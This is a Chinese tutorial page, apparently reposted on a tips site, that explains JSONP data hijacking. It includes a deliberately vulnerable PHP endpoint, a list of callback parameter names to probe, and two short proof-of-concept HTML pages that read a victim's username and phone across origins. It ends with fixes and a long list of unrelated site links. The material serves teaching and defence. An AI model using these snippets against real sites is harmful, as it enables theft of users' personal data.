位置: IT常识 - 正文

JSONP数据劫持漏洞(json解析漏洞)

编辑:rootadmin
JSONP数据劫持漏洞 ​介绍

推荐整理分享JSONP数据劫持漏洞(json解析漏洞),希望有所帮助,仅作参考,欢迎阅读内容。

文章相关热门搜索词:json劫持漏洞验证方法,json数据解析错误是什么意思,json数据解析错误是什么意思,jsonp漏洞利用,json loads dumps,jsonp漏洞利用,json劫持漏洞验证方法,json劫持怎么防止,内容如对您有帮助,希望把文章链接给更多的朋友!

JSONP(JSON with Padding)是 json 的一种"使用模式",可以让网页从别的域名(网站)那获取资料,即跨域读取数据;它利用的是script标签的 src 属性不受同源策略影响的特性,使网页可以得到从其他来源动态产生的 json 数据,因此可以用来实现跨域读取数据。

更通俗的说法:JSONP 就是利用 <script> 标签的跨域能力实现跨域数据的访问,请求动态生成的 JavaScript 脚本同时带一个 callback 函数名作为参数。服务端收到请求后,动态生成脚本产生数据,并在代码中以产生的数据为参数调用 callback 函数。

漏洞原理

和 CSRF 类似,都需要用户交互,而 CSRF 主要是以用户的账户进行增删改的操作,jsonp 则主要用来劫持数据。

当网站通过 JSONP 方式传递用户敏感信息时,攻击者可以伪造 JSONP 调用页面,诱导被攻击者访问来达到窃取用户信息的目的;jsonp 数据劫持就是攻击者获取了本应该传给网站其他接口的数据。

漏洞代码

假设这是目标网站上的代码,然后我们利用漏洞就可以劫持到里面的数据,如username、phone

<?php//test.phpheader('Content-type: application/json');$callback = $_GET['callback'];print $callback.'({"username" : "d4m1ts","phone" : "13888888888"});';?>

快速启动 php 环境

php -S 127.0.0.1:9999 实现效果

利用场景

如上图,所有包含有callback等回调函数的,且请求方式为 GET,没有验证 referer 等,都可以尝试下该漏洞

如果返回内容是 json 格式的,但是没有回调函数,我们可以尝试手动添加回调函数去试试运气,一些常见的如下:

_callback=mstkey_cb=mstkeycallback=mstkeycb=mstkeyjsonp=mstkeyjsonpcallback=mstkeyjsonpcb=mstkeyjsonp_cb=mstkeyjson=mstkeyjsoncallback=mstkeyjcb=mstkeycall=mstkeycallBack=mstkeyjsonpCallback=mstkeyjsonpCb=mstkeyjsonp_Cb=mstkeyjsonCallback=mstkeyca=mstkey漏洞利用

当我们发现信息泄露的 jsonp 接口以后,我们需要构造一个恶意 html 页面,然后引诱受害者去访问这个网站,一旦访问了这个网站,脚本就会自动运行,就会向这个接口请求用户的敏感数据,并传送到攻击者的服务器上。

POC基于实现回调函数<script>function xxx(data){ alert(data.username);}</script><script src="http://127.0.0.1:9999/test.php?callback=xxx"></script>JSONP数据劫持漏洞(json解析漏洞)

保存为 html,诱导受害者访问,可见成功获取到了username信息

image-20220322171224615

简而言之:存在信息泄漏的 JSONP 接口http://127.0.0.1:9999/test.php?callback=xxx,攻击者构造 POC 后诱导用户访问 POC,然后就会调用这个接口获取到敏感数据,获取到的敏感数据被攻击者截获了。

另一个 POC基于 jquery<script src="http://cdn.static.runoob.com/libs/jquery/1.8.3/jquery.js"></script><script type="text/javascript"> $.getJSON("http://127.0.0.1:9999/test.php?callback=?", function(data){ alert(data.phone); });</script>

image-20220322173916125

修复建议

扩展

修复建议

接受请求时检查referer来源;

在请求中添加token并在后端进行验证;

严格过滤 callback 函数名及 JSON 里数据的输出。

扩展

如果目标的 header 头没有设置Content-Type为json,而是html,那么也可以造成 XSS 漏洞

一个获取 QQ 号的 JSONP 劫持实例[1]

image-20220322185037473

推荐阅读:JSONP 挖掘与高级利用[2]

参考资料

[1]一个获取 QQ 号的 JSONP 劫持实例: http://www.piaoyi.org/network/get-qq-haoma-js.html

[2]JSONP 挖掘与高级利用: http://drops.xmd5.com/static/drops/papers-6630.html

本文链接地址:https://www.jiuchutong.com/zhishi/299576.html 转载请保留说明!

上一篇:单目测距原理与实现(代码可运行)(单目测距精度)

下一篇:强化学习——Q-Learning算法原理

  • 美的热水器维修官网电话号码查询(美的热水器维修)(美的热水器维修24小时上门服务)

    美的热水器维修官网电话号码查询(美的热水器维修)(美的热水器维修24小时上门服务)

  • 小米盒子怎么投屏(小米盒子怎么投屏安装软件)

    小米盒子怎么投屏(小米盒子怎么投屏安装软件)

  • Redmi K30 Pro支持的快充是多少w(redmi k30 pro支持快充多少瓦)

    Redmi K30 Pro支持的快充是多少w(redmi k30 pro支持快充多少瓦)

  • 闲鱼上的擦亮什么意思(闲鱼上擦亮和重新发布有啥区别)

    闲鱼上的擦亮什么意思(闲鱼上擦亮和重新发布有啥区别)

  • edlal10是什么手机型号(edl-al10是什么型号)

    edlal10是什么手机型号(edl-al10是什么型号)

  • 钉钉直播可以看别人的手机在干嘛吗(钉钉直播可以看见学生什么时候进的吗)

    钉钉直播可以看别人的手机在干嘛吗(钉钉直播可以看见学生什么时候进的吗)

  • 公交卡网上能充值吗(公交卡网上充值发票怎么开)

    公交卡网上能充值吗(公交卡网上充值发票怎么开)

  • 引导式访问下怎样关机(引导式访问怎么使用)

    引导式访问下怎样关机(引导式访问怎么使用)

  • ipadmini3能用笔么(ipadmini3可以用pencil吗)

    ipadmini3能用笔么(ipadmini3可以用pencil吗)

  • iphonexs锁屏相机手电筒失效(iphonex锁屏打开相机)

    iphonexs锁屏相机手电筒失效(iphonex锁屏打开相机)

  • 买移动硬盘需要注意什么问题(买移动硬盘需要买什么样的)

    买移动硬盘需要注意什么问题(买移动硬盘需要买什么样的)

  • 电脑信号线是哪个(电脑信号线是哪个位置)

    电脑信号线是哪个(电脑信号线是哪个位置)

  • 鼠标滚轮突然没有阻力了(鼠标滚轮突然没阻力怎么回事)

    鼠标滚轮突然没有阻力了(鼠标滚轮突然没阻力怎么回事)

  • 抖音不是好友能私信吗(抖音不是好友能分享视频吗)

    抖音不是好友能私信吗(抖音不是好友能分享视频吗)

  • 线控耳机唤醒是什么意思(线控耳机唤醒是不是能自动关闭多媒体音量)

    线控耳机唤醒是什么意思(线控耳机唤醒是不是能自动关闭多媒体音量)

  • 微信怎么恢复白色背景(微信怎么恢复白色主界面)

    微信怎么恢复白色背景(微信怎么恢复白色主界面)

  • 苹果5为什么不能下载微信(苹果5为什么不能下载软件)

    苹果5为什么不能下载微信(苹果5为什么不能下载软件)

  • 小米mi5c是什么型号(小米五c参数)

    小米mi5c是什么型号(小米五c参数)

  • iphonexr什么时候上市的(iphonexr什么时候停产的)

    iphonexr什么时候上市的(iphonexr什么时候停产的)

  • 小米9的双频gps要开吗(小米手机双频gps是什么意思)

    小米9的双频gps要开吗(小米手机双频gps是什么意思)

  • 苹果自带测量工具在哪(苹果手机自带测量工具是哪个)

    苹果自带测量工具在哪(苹果手机自带测量工具是哪个)

  • 360浏览器如何卸载(360浏览器如何卸载插件)

    360浏览器如何卸载(360浏览器如何卸载插件)

  • 1660和1060对比(1660和1060的区别)

    1660和1060对比(1660和1060的区别)

  • iphone苹果手机如何去除App Store图标右上角更新提(苹果手机zm)

    iphone苹果手机如何去除App Store图标右上角更新提(苹果手机zm)

  • 税务局开票需要交钱吗
  • 生产经营所得个人所得税怎么申报
  • 增值税纳税申报表电子版在哪下载
  • 出口企业税负率计算公式
  • 中小型企业营业额和从业人数
  • 工程咨询属于什么合同
  • 无偿调入固定资产计提折旧吗
  • 财务费用余额方向怎么填
  • 公司给员工租的宿舍怎么交税
  • 库存现金贷方为负数说明什么
  • 闲置设备折旧企业所得税税前扣除
  • 资产减值损失负数是好是坏
  • 股权投资类企业税收政策
  • 个人以房抵债交税吗
  • 逾期包装物押金消费税会计分录
  • 税控盘服务费跨年还能抵吗
  • 工程发票没写经办人没写可以吗
  • 增资印花税增加哪个税目
  • 个体户开票要交印花税?
  • 购买食堂餐具开票怎么开
  • 同一控制下股权转让印花税
  • 企业的经济成本由什么构成
  • 企业公示啥意思
  • WIN7系统的镜像文件在哪里
  • windows刷新桌面
  • 委托检验报告能否作为处罚依据
  • 如何向企业支付宝收款
  • 如何计算劳务费个人所得税
  • 个体户流水太大工商局会查吗
  • 计提安全费用含税还是不含税
  • 招待费审批流程
  • 销售使用过的固定资产怎么填申报表
  • 外币交易犯法吗
  • 新购固定资产账务处理
  • 工程完工后有质量问题能解除合同吗
  • phpinfophp漏洞利用
  • 报销差旅费的会计分录为什么是其他应收款
  • typescript和javascript那个更高级
  • css中文字垂直排列
  • continue命令必须与locate
  • 公办学校的会计
  • 实收资本确认时间什么入账
  • 出差的车费计入什么科目
  • 车间领用材料应编制什么凭证
  • 免征企业所得税的有哪些行业
  • python多进程间通信
  • 高新技术企业研发人员比例要求
  • 金税盘怎么向分盘分配发票
  • 成品油涉及范围有哪些
  • 代收收款收据证明范本
  • 厂区道路折旧年限最新规定
  • mysql从一个库导入进另一个库
  • 冲抵货款是什么意思
  • 商贸公司经营范围可以写烟酒吗
  • 作业成本多用于直接成本的核算
  • 简易计税项目的进项税能抵一般项目的销项税额吗?
  • 企业收到的政府补助属于
  • 固定资产原价的含义
  • 往来是啥意思
  • 会计计量属性是什么意思
  • 商品流通的企业
  • ubuntu怎样调出命令行
  • 怎么修改win10登录名
  • Windows搭建代理服务器
  • cocos2dx 教程
  • 简述android应用的常用开发模式及其优缺点
  • shell脚本运行c程序
  • “android”
  • linux命令提示符
  • 如何输出反序数
  • javascript语言中,以下关于array
  • unity dc
  • javascript中函数
  • 怎么用js实现滑动效果
  • jquery编写Tab选项卡滚动导航切换特效
  • static function FindObjectsOfType (type : Type) : Object[]
  • python中的全局变量
  • 总公司与分公司的法律责任
  • 税务登记证书怎么办
  • 娱乐会所一般有什么
  • 免责声明:网站部分图片文字素材来源于网络,如有侵权,请及时告知,我们会第一时间删除,谢谢! 邮箱:opceo@qq.com

    鄂ICP备2023003026号

    网站地图: 企业信息 工商信息 财税知识 网络常识 编程技术

    友情链接: 武汉网站建设